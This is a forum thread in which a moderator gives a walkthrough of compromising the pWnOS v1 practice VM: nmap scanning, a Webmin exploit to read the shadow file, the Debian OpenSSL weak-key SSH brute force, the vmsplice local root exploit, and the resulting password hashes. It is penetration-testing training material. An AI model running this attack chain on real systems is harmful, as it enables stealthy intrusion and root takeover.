Results 1 to 8 of 8

Thread: [Video] Attacking - pWnOS

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Video] Attacking - pWnOS

    Watch video on-line:
    Download video:
    What is this?
    This is my walk though of how I broke into pWnOS v1.
    pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points

    A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
    It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.

    What do I need?
    > BackTrack 4 (Final)
    > pWnOS.vmdk
    > or milw0rm.

    Name: pWnOS
    Version: 1
    Home Page:
    Download Link:


    nmap -sV -sS -O
    firefox -> milw0rm/ -> search "Webmin" -> save. Filename:
    *Webmin <> save. Filename: shadow
    firefox -> milw0rm/ -> search "Debian OpenSSL" -> save. Filename:
    *Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*        (perl)        (python)        (ruby) (perl) (python) (ruby)
    perl 10000 /home/vmware/.ssh/authorized_keys
    perl 10000 /home/obama/.ssh/authorized_keys
    perl 10000 /home/osama/.ssh/authorized_keys
    perl 10000 /home/yomama/.ssh/authorized_keys
    tar jxvf
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
    *scans for the public key...*
    ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@
    ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@
    uname -a
    firefox -> milw0rm/ -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
    *Linux Kernel 2.6.17 - vmsplice Local Root Exploit*         (c)  (c)
    nano vmsplice.c
    gcc vmsplice.c -o vmsplice
    root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
    vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::


    I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

    This is one method of getting in, the author did say that there is multiple ways in!

    It took me a bit of work to also to get it to work with virtual box & static IP addresses.
    Read my post here (short answer - need configure another interface via another OS)

    Song: Deadmau5 - Faxing Berlin
    Video length: 07:37
    Capture length: 14:55

    Blog Post:
    Forum Post: OR
    Last edited by g0tmi1k; 03-05-2011 at 02:27 PM.
    Have you...g0tmi1k?

  2. #2
    Junior Member Shemsu-Hor's Avatar
    Join Date
    Aug 2009

    Default Re : [Video] Attacking - pWnOS

    Very nice ! Thanks

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009

    Thumbs up Re: [Video] Attacking - pWnOS

    Thank you for all these videos.

    You have made a great job!!!

  4. #4
    Just burned his ISO
    Join Date
    Jul 2010

    Default Re: [Video] Attacking - pWnOS

    Amazing video . really liked it . Thanks for the share

  5. #5
    Just burned his ISO hitasb's Avatar
    Join Date
    Aug 2010

    Default Re: [Video] Attacking - pWnOS

    Ow nice , good job , thanks for sharing .

  6. #6
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Default Re: [Video] Attacking - pWnOS

    Quote Originally Posted by Shemsu-Hor View Post
    Very nice ! Thanks
    Quote Originally Posted by jayp75 View Post
    Thank you for all these videos.

    You have made a great job!!!
    Quote Originally Posted by D4rk357 View Post
    Amazing video . really liked it . Thanks for the share
    Quote Originally Posted by hitasb View Post
    Ow nice , good job , thanks for sharing .
    Thanks for the thanks guys!
    Have you...g0tmi1k?

Similar Threads

  1. [Video] v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  4. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts